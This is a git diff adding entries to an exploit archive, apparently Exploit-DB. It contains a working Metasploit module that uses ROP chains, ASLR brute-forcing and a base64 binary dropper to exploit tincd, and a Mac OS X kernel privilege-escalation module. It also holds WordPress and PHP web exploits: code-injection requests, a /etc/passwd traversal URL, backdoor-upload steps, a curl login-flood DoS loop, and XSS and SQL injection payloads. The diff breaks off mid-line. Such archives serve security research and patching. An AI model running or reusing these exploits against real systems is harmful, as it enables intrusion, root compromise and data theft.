+    #  cat /proc/sys/kernel/randomize_va_space
+    # 2
+    # --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
+    #      This is the default setting."
+    # Here some examples of the address of the system function:
+    # 0xb6c40848
+    # 0xb6cdd848
+    # 0xb6c7c848
+    # Looks like we would have to brute force one byte
+    # (gdb) info proc mappings
+    #  0x8000    0x23000    0x1b000          0         /usr/local/sbin/tincd
+    # 0x2b000    0x2c000     0x1000    0x1b000         /usr/local/sbin/tincd
+    # When we exploit we get the following:
+    # Program received signal SIGSEGV, Segmentation fault.
+    # 0x90909090 in ?? ()
+    # ok, finally a different offset to eip. Let's figure it out:
+    # $ tools/pattern_create.rb 1676
+    # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
+    # (gdb) break *0x9000
+    # Breakpoint 1 at 0x9000
+    # See that our shellcode is *on* the stack:
+    # (gdb) x/10x $sp
+    # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
+    # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
+    # 0xbee14328: 0xe3a02006 0xe3a07001
+    # let's explore the code we can reuse:
+    # (gdb) info functions
+    # objdump -d /usr/local/sbin/tincd >assembly.txt
+    # while simply searching for the bx instruction we were not very lucky,
+    # but searching for some "pop pc" it's easy to find nice gadgets.
+    # we can write arguments to the .data section again:
+    # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
+    # The problem is we can not reliably forecast the system function's address, but it's
+    # only one byte random, therefore we have to brute force it and/or find a memory leak.
+    # Let's assume it's a restarting daemon:
+    # create /etc/systemd/system/tincd.service and fill in Restart=restart-always
+
+    # ARM Debian Wheezy on qemu
+    # root@debian:~# apt-cache showpkg tinc
+    # Package: tinc
+    # Versions:
+    # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
+    # nice, that's vulnerable
+    # apt-get install tinc
+    # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
+    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
+    # # ./checksec.sh --file /usr/sbin/tincd
+    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
+    # Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /usr/sbin/tincd
+    # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here
+
+    packet_payload = payload.encoded
+    # Pidora and Fedora/ROP specific things
+    if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
+      rop_generator = nil
+      filename = rand_text_alpha(1)
+      cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
+      cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'
+
+      if target.name =~ /Pidora 18/
+        print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
+        print_status('This requires a restarting tincd daemon!')
+        print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
+        rop_generator = method(:create_pidora_rop)
+      elsif target.name =~ /Fedora 19/
+        print_status('Using ROP to defeat NX on Fedora 19')
+        rop_generator = method(:create_fedora_rop)
+      end
+
+      if target.arch.include? ARCH_CMD
+        # The CMD payloads are a bit tricky on Fedora. As of december 2013
+        # some of the generic unix payloads (e.g. reverse shell with awk) don't work
+        # (even when executed directly in a terminal on Fedora)
+        # use generic/custom and specify PAYLOADSTR without single quotes
+        # it's usually sh -c *bla*
+        packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
+      else
+        # the binary drop payloads
+        packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
+        if packet_payload.length > target['offset']
+          print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
+          packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
+          vprint_status("Achieved version with #{packet_payload.length} bytes")
+        end
+      end
+    end
+
+    if packet_payload.length > target['offset']
+      fail_with(Exploit::Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
+    end
+    injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')
+
+    vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")
+
+    if target.name =~ /Pidora 18/
+      # we have to brute force to defeat ASLR
+      datastore['BRUTEFORCE_TRIES'].times do
+        print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
+        setup_ciphers
+        print_status('Telling tinc exploit client to connect, handshake and send the payload')
+        begin
+          send_recv(injection)
+        rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
+          print_error(runtime_error.message)
+          print_error(runtime_error.backtrace.join("\n\t"))
+        rescue Rex::ConnectionRefused
+          print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
+          sleep(3)
+          next
+        end
+        secs = datastore['WAIT']
+        print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
+        sleep(secs)
+      end
+      print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
+    else
+      # Setup local ciphers
+      print_status('Initializing tinc exploit client (setting up ciphers)')
+      setup_ciphers
+      # The tincdExploitClient will do the crypto handshake with the server and
+      # send the injection (a packet), where the actual buffer overflow is triggered
+      print_status('Telling tinc exploit client to connect, handshake and send the payload')
+      send_recv(injection)
+    end
+    print_status('Exploit finished')
+  end
+
+  def get_cmd_binary_drop_payload(filename, cd, rop_generator)
+    elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
+    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
+    vprint_status("You will try to execute #{cmd.join(' ')}")
+    rop_generator.call(cmd)
+  end
+
+  def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
+    elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
+    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
+    vprint_status("You will try to execute #{cmd.join(' ')}")
+    rop_generator.call(cmd)
+  end
+
+  def create_pidora_rop(sys_execv_args)
+    sys_execv_args = sys_execv_args.join(' ')
+    sys_execv_args += "\x00"
+
+    aslr_byte_guess = SecureRandom.random_bytes(1).ord
+    print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")
+
+    # Gadgets tincd
+    # c714:	e1a00004 	mov	r0, r4
+    # c718:	e8bd8010 	pop	{r4, pc}
+    mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
+    pop_r4_ret = [0x0000c718].pack('V')
+    # 1cef4:	e580400c 	str	r4, [r0, #12]
+    # 1cef8:	e8bd8010 	pop	{r4, pc}
+    # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')
+
+    # bba0:	e5843000 	str	r3, [r4]
+    # bba4:	e8bd8010 	pop	{r4, pc}
+    mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')
+
+    # 13ccc:	e1a00003 	mov	r0, r3
+    # 13cd0:	e8bd8008 	pop	{r3, pc}
+    pop_r3_ret = [0x00013cd0].pack('V')
+
+    # address to start rop (removing 6 addresses of garbage from stack)
+    # 15cb4:	e8bd85f0 	pop	{r4, r5, r6, r7, r8, sl, pc}
+    # start_rop = [0x00015cb4].pack('V')
+    # see target Ret
+
+    # system function address base to brute force
+    # roughly 500 tests showed addresses between
+    # 0xb6c18848 and 0xb6d17848 (0xff distance)
+    system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')
+
+    # pointer into .data section
+    loc_dot_data = 0x0002b3f0 # a location inside .data
+
+    # Rop into system(), prepare address of payload in r0
+    rop = ''
+
+    # first, let's put the payload into the .data section
+
+    # Put the first location to write to in r4
+    rop += pop_r4_ret
+
+    sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
+      # Give location inside .data via stack
+      rop += [loc_dot_data + i * 4].pack('V')
+      # Pop 4 bytes of the command into r3
+      rop += pop_r3_ret
+      # Give 4 bytes of command on stack
+      if argument_part.length == 4
+        rop += argument_part
+      else
+        rop += argument_part + rand_text_alpha(4 - argument_part.length)
+      end
+      # Write the 4 bytes to the writable location
+      rop += mov_to_r4_addr_pop_r4_ret
+    end
+
+    # put the address of the payload into r4
+    rop += [loc_dot_data].pack('V')
+
+    # now move r4 to r0
+    rop += mov_r0_r4_pop_r4_ret
+    rop += rand_text_alpha(4)
+    # we don't care what ends up in r4 now
+
+    # call system
+    rop += system_addr
+  end
+
+  def create_fedora_rop(sys_execv_args)
+    # Gadgets tincd
+    loc_dot_data = 0x80692e0 # a location inside .data
+    pop_eax = [0x8065969].pack('V') # pop eax; ret
+    pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
+    pop_ecx = [0x804e113].pack('V') # pop ecx; ret
+    xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
+    # <ATTENTION> This one destroys ebx:
+    mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
+    # </ATTENTION>
+
+    # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
+    xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
+    # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
+    # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret
+
+    # Gadgets libc.so.6 libc-2.17.so
+    pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
+    int_80 = [0x4b6049c5].pack('V') # int 0x80
+
+    # Linux kernel system call 11: sys_execve
+    # ROP
+    rop = ''
+
+    index = 0
+    stored_argument_pointer_offsets = []
+
+    sys_execv_args.each_with_index do |argument, argument_no|
+      stored_argument_pointer_offsets << index
+      argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
+        # Put location to write to in eax
+        rop += pop_eax
+        # Give location inside .data via stack
+        rop += [loc_dot_data + index + i * 4].pack('V')
+        # Pop 4 bytes of the command into ecx
+        rop += pop_ecx
+        # Give 4 bytes of command on stack
+        if argument_part.length == 4
+          rop += argument_part
+        else
+          rop += argument_part + rand_text_alpha(4 - argument_part.length)
+        end
+        # Write the 4 bytes to the writable location
+        rop += mov_to_eax_addr
+      end
+      # We have to end the argument with a zero byte
+      index += argument.length
+      # We don't have "xor ecx, ecx", but we have it for eax...
+      rop += xor_eax_eax
+      rop += xchg_ecx_eax
+      # Put location to write to in eax
+      rop += pop_eax
+      # Give location inside .data via stack
+      rop += [loc_dot_data + index].pack('V')
+      # Write the zeros
+      rop += mov_to_eax_addr
+      index += 1 # where we can write the next argument
+    end
+
+    # Append address of the start of each argument
+    stored_argument_pointer_offsets.each do |offset|
+      rop += pop_eax
+      rop += [loc_dot_data + index].pack('V')
+      rop += pop_ecx
+      rop += [loc_dot_data + offset].pack('V')
+      rop += mov_to_eax_addr
+      index += 4
+    end
+    # end with zero
+    rop += xor_eax_eax
+    rop += xchg_ecx_eax
+
+    rop += pop_eax
+    rop += [loc_dot_data + index].pack('V')
+    rop += mov_to_eax_addr
+
+    rop += pop_ebx
+    rop += [loc_dot_data].pack('V')
+
+    rop += pop_ecx
+    rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')
+
+    rop += pop_edx
+    rop += [loc_dot_data + index].pack('V')
+
+    # sys call 11 = sys_execve
+    rop += pop_eax
+    rop += [0x0000000b].pack('V')
+
+    rop += int_80
+  end
+end
\ No newline at end of file
diff --git a/platforms/osx/local/35440.rb b/platforms/osx/local/35440.rb
new file mode 100755
index 000000000..a764ee47e
--- /dev/null
+++ b/platforms/osx/local/35440.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ManualRanking # Can cause kernel crash
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
+      'Description'   => %q{
+        A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
+        corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
+        pointers can also be leaked, allowing a full kASLR bypass.
+
+        Tested on Mavericks 10.9.5, and should work on previous versions.
+
+        The issue has been patched silently in Yosemite.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
+          'joev' # copy/paste monkey
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2014-4404' ],
+          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
+          # Heap overflow:
+          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
+          # kALSR defeat:
+          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
+        ],
+      'Platform'      => 'osx',
+      'Arch'          => ARCH_X86_64,
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'Targets'       => [
+        [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 24 2014'
+    ))
+  end
+
+  def check
+    if ver_lt(osx_ver, "10.10")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
+    binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
+    binary_payload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+
+    print_status("Writing exploit file as '#{exploit_file}'")
+    write_file(exploit_file, binary_exploit)
+    register_file_for_cleanup(exploit_file)
+
+    print_status("Writing payload file as '#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+
+    print_status("Executing payload...")
+    cmd_exec("chmod +x #{exploit_file}")
+    cmd_exec("chmod +x #{payload_file}")
+    cmd_exec("#{exploit_file} #{payload_file}")
+  end
+
+  def osx_ver
+    cmd_exec("sw_vers -productVersion").to_s.strip
+  end
+
+  def ver_lt(a, b)
+    Gem::Version.new(a) < Gem::Version.new(b)
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/35324.txt b/platforms/php/webapps/35324.txt
new file mode 100755
index 000000000..0837108dc
--- /dev/null
+++ b/platforms/php/webapps/35324.txt
@@ -0,0 +1,78 @@
+# Vulnerability title: Code Injection in Wordpress CM Download Manager plugin 2.0.0
+# CVE: CVE-2014-8877 
+# Plugin: CM Download Manager plugin
+# Vendor: CreativeMinds - https://www.cminds.com/
+# Link download: https://wordpress.org/plugins/cm-download-manager/
+# Affected version: 2.0.0 and previous version
+# Fixed version: 2.0.4
+# Google dork: inurl:cmdownloads
+# Reported by: Le Ngoc Phi - phi.n.le (at) itas (dot) vn [email concealed]
+# Credits to ITAS Team - www.itas.vn
+
+::DESCRITION::
+
+The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment.
+
+GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
+Connection: keep-alive
+
+Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadC
+ontroller.php
+Vulnerable code: (Line: 130 -> 158)
+
+public static function alterSearchQuery($search, $query)
+{
+if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
+{
+global $wpdb;
+$search_term = $_GET['CMDsearch'];
+if( !empty($search_term) )
+{
+$search = '';
+$query->is_search = true;
+// added slashes screw with quote grouping when done early, so done later
+$search_term = stripslashes($search_term);
+preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
+$terms = array_map('_search_terms_tidy', $matches[0]);
+
+$n = '%';
+$searchand = ' AND ';
+foreach((array) $terms as $term)
+{
+$term = esc_sql(like_escape($term));
+$search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
+}
+add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
+remove_filter('posts_request', 'relevanssi_prevent_default_request');
+remove_filter('the_posts', 'relevanssi_query');
+}
+}
+return $search;
+}
+
+::SOLUTION::
+Update to version 2.0.4
+
+::DISCLOSURE::
+2014-11-08 initial vendor contact
+2014-11-10 vendor response
+2014-11-10 vendor confirmed 
+2014-11-11 vendor release patch
+2014-11-14 public disclosure
+
+::REFERENCE::
+https://downloadsmanager.cminds.com/release-notes/
+http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.
+html?language=en
+
+::COPYRIGHT::
+Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.
+
+::DISCLAIMER::
+THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
\ No newline at end of file
diff --git a/platforms/php/webapps/35378.txt b/platforms/php/webapps/35378.txt
new file mode 100755
index 000000000..777a4522c
--- /dev/null
+++ b/platforms/php/webapps/35378.txt
@@ -0,0 +1,29 @@
+|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
+|-------------------------------------------------------------------------|
+|[*] Exploit Title: Wordpress db-backup plugin File Download Vulnerability
+|
+|[*] Google Dork: inurl:wp-content/plugins/db-backup/
+|
+|[*] Date : Date: 2014-11-26
+|
+|[*] Exploit Author: Ashiyane Digital Security Team
+|
+|[*] Vendor Homepage : https://wordpress.org/plugins/wp-database-backup/
+|
+|[*] Plugin Link : https://downloads.wordpress.org/plugin/wp-database-backup.zip
+|
+|[*] Tested on: Windows 7
+|
+|[*] Discovered By : ACC3SS
+|
+|-------------------------------------------------------------------------|
+|
+|[*] Location :[localhost]/wp-content/plugins/db-backup/download.php?file=/etc/passwd
+|
+|-------------------------------------------------------------------------|
+|
+|
+|-------------------------------------------------------------------------|
+|-------------------------------------------------------------------------|
+|-------------------------------------------------------------------------|
+|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
\ No newline at end of file
diff --git a/platforms/php/webapps/35396.txt b/platforms/php/webapps/35396.txt
new file mode 100755
index 000000000..d35dbfbb1
--- /dev/null
+++ b/platforms/php/webapps/35396.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Multiple Vulnerability xEpan 1.0.4
+# Google Dork: not yet
+# Date: 2014-11-27
+# Exploit Author: Parikesit , Kurawa In Disorder
+# Vendor Homepage: http://xepan.org
+# Software Link: http://www.xepan.org/index.php?subpage=download
+# Version: 1.0.4
+# Tested on: Windows 7 Ultimate
+# Vulnerability Type: File Upload
+# Risk Level: High
+# Solution Status: Not Fixed
+# Discovered and Provided: Kurawa In Disorder ( http://kurawa.indonesianbacktrack.or.id ) , Indonesian Backtrack Team ( http://indonesianbacktrack.or.id )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+xEpan have elfinder which can exploited to upload a backdoor
+
+1.) vulnerable page : http://target/elfinder/elfinder.html
+Just upload your php backdoor 
+and acess there http://target/elfinder/files/<backdoor_name>
+
+2.) leak database information : http://target/install.sql
+after installation the script not remove the .sql file it's can be danger
+
+3.) important file , like ftp password stored in a public file : http://target/ftpsync.settings
+very danger , how to prevent just use a private privilages or delete the file
+
+4.) weak password used : http://target/index.php?page=owner_dashboard
+admin:admin ... :o 
+
+-----------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/platforms/php/webapps/35414.txt b/platforms/php/webapps/35414.txt
index 928cd2753..ad3cbcdc0 100755
--- a/platforms/php/webapps/35414.txt
+++ b/platforms/php/webapps/35414.txt
@@ -25,7 +25,8 @@ in&form_id=user_login" >> valid_user_payload
 Perform a Dos with a valid user:
 
 for i in `seq 1 150`; do (curl --data @valid_user_payload
-http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done
+http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep
+0.25; done
 
 ====================================================================
 Authors:
diff --git a/platforms/php/webapps/35439.txt b/platforms/php/webapps/35439.txt
new file mode 100755
index 000000000..d43e99ba3
--- /dev/null
+++ b/platforms/php/webapps/35439.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Nextend Facebook Connect 1.4.59 XSS
+# Date: 16-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
+# Software Link: https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.4.59.zip
+# Category: webapps
+# CVE: CVE-2014-8800
+  
+1. Description
+  
+Anyone can change plugin settings.
+
+File: nextend-facebook-connect\nextend-facebook-settings.php
+if(isset($_POST['newfb_update_options'])) {
+	if($_POST['newfb_update_options'] == 'Y') {
+		foreach($_POST AS $k => $v){
+			$_POST[$k] = stripslashes($v);
+		}
+		update_option("nextend_fb_connect", maybe_serialize($_POST));
+		$newfb_status = 'update_success';
+	}
+}
+
+http://security.szurek.pl/nextend-facebook-connect-1459-xss.html
+  
+2. Proof of Concept
+  
+<form method="post" action="http://wordpress-instalation">
+    <input type="hidden" name="newfb_update_options" value="Y">
+    XSS: <textarea name="fb_login_button" rows="10" cols="40"><img src=x onerror=alert(String.fromCharCode(88,83,83))>&lt;/textarea&gt;
+    <input type="submit" value="Hack!">
+</form>
+  
+3. Solution:
+  
+Update to version 1.5.1
+https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.5.1.zip
+https://wordpress.org/plugins/nextend-facebook-connect/changelog/
\ No newline at end of file
diff --git a/platforms/php/webapps/35443.txt b/platforms/php/webapps/35443.txt
new file mode 100755
index 000000000..8ba203a60
--- /dev/null
+++ b/platforms/php/webapps/35443.txt
@@ -0,0 +1,138 @@
+Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf
+
+During a penetration test RedTeam Pentesting discovered a remote code
+execution vulnerability in the TYPO3 extension ke_dompdf, which allows
+attackers to execute arbitrary PHP commands in the context of the
+webserver. 
+
+
+Details
+=======
+
+Product: ke_dompdf TYPO3 extension
+Affected Versions: 0.0.3<=
+Fixed Versions: 0.0.5
+Vulnerability Type: Remote Code Execution
+Security Risk: high
+Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
+Advisory Status: published
+CVE: CVE-2014-6235
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235
+
+
+Introduction
+============
+
+"DomPDF library and a small pi1 to show how to use DomPDF to render the
+current typo3-page to pdf."
+(taken from the extension's description)
+
+
+More Details
+============
+
+The TYPO3 extension ke_dompdf contains a version of the dompdf library
+including all files originally supplied with it. This includes an
+examples page, which contains different examples for HTML-entities
+rendered as a PDF.  This page also allows users to enter their own HTML
+code into a text box to be rendered by the webserver using dompdf.
+dompdf also supports rendering of PHP files and the examples page also
+accepts PHP code tags, which are then executed and rendered into a PDF
+on the server.
+
+Since those files are not protected in the TYPO3 extension directory,
+anyone can access this URL and execute arbitrary PHP code on the system.
+This behaviour was already fixed in the dompdf library, but the typo3
+extension ke_dompdf supplies an old version of the library that still
+allows the execution of arbitrary PHP code.
+
+
+Proof of Concept
+================
+
+Access examples.php on the vulnerable system:
+http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php
+
+Enter PHP code in the text box on the bottom of the page and click the
+submit button, for example:
+
+------------------------------------------------------------------------
+<?php phpinfo() ?>
+------------------------------------------------------------------------
+
+The page will return a PDF file containing the output of the PHP code.
+
+
+Workaround
+==========
+
+Remove the directory "www" containing the examples.php file or at least
+the examples.php file from the extensions' directory.
+
+
+Fix
+===
+
+Update to version 0.0.5 of the extension.
+
+
+Security Risk
+=============
+
+high
+
+
+Timeline
+========
+
+2014-04-21 Vulnerability identified
+2014-04-30 Customer approved disclosure to vendor
+2014-05-06 CVE number requested
+2014-05-10 CVE number assigned
+2014-05-13 Vendor notified
+2014-05-20 Vendor works with TYPO3 security team on a fix
+2014-09-02 Vendor released fixed version [2]
+2014-12-01 Advisory released
+
+
+References
+==========
+
+The TYPO3 extension ke_dompdf contains an old version of the dompdf
+library, which contains an example file that can be used to execute
+arbitrary commands.  This vulnerability was fixed in dompdf in 2010. The
+relevant change can be found in the github repository of dompdf:
+
+[1] https://github.com/dompdf/dompdf/commit/
+    e75929ac6393653a56e84dffc9eac1ce3fb90216
+
+TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:
+
+[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/
+    typo3-ext-sa-2014-010/
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests, short pentests,
+performed by a team of specialised IT-security experts. Hereby, security
+weaknesses in company networks or products are uncovered and can be
+fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at
+https://www.redteam-pentesting.de.
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/platforms/php/webapps/35444.txt b/platforms/php/webapps/35444.txt
new file mode 100755
index 000000000..25750f24c
--- /dev/null
+++ b/platforms/php/webapps/35444.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/46829/info
+
+LMS Web Ensino is prone to the following input-validation vulnerabilities:
+
+1. Multiple cross-site scripting vulnerabilities
+2. An SQL-injection vulnerability
+3. A cross-site request-forgery vulnerability
+4. A session-fixation vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary code, hijack a user's session, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar 
+
+http://www.example.com/lms/sistema/webensino/index.php?modo=itensCategoriaBiblioteca&codBibliotecaCategoria=<SQLi> 
\ No newline at end of file
diff --git a/platforms/php/webapps/35447.txt b/platforms/php/webapps/35447.txt
new file mode 100755
index 000000000..9691f3d64
--- /dev/null
+++ b/platforms/php/webapps/35447.txt
@@ -0,0 +1,53 @@
+Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
+Data : 2014 – 12 -03
+Exploit Author : Securely (Yoo Hee man)
+Plugin : google-document-embedder
+Fixed version : N/A
+Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip
+
+1. Detail 
+- Google Document Embedder v2.5.14 have SQL Injection
+- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
+- but mysql_real_escape_string() function is bypass possible
+- vulnerability file : /google-document-embedder/~view.php
+
+================================================================
+50	// get profile
+51	if ( isset( $_GET['gpid'] ) ) {
+52		$gpid = mysql_real_escape_string( $_GET['gpid'] );
+		//mysql_real_escape_string() is bypass 
+53		if ( $profile = gde_get_profile( $gpid ) ) {
+54			$tb = $profile['tb_flags'];
+55			$vw = $profile['vw_flags'];
+56			$bg = $profile['vw_bgcolor'];
+57			$css = $profile['vw_css'];
+58		}
+59	}
+================================================================
+
+===============================================================
+373 function gde_get_profile( $id ) {
+374	global $wpdb;
+375	$table = $wpdb->prefix . 'gde_profiles';
+376	
+377	$profile = $wpdb->get_results( "SELECT * FROM $table WHERE 
+
+profile_id = $id", ARRAY_A );
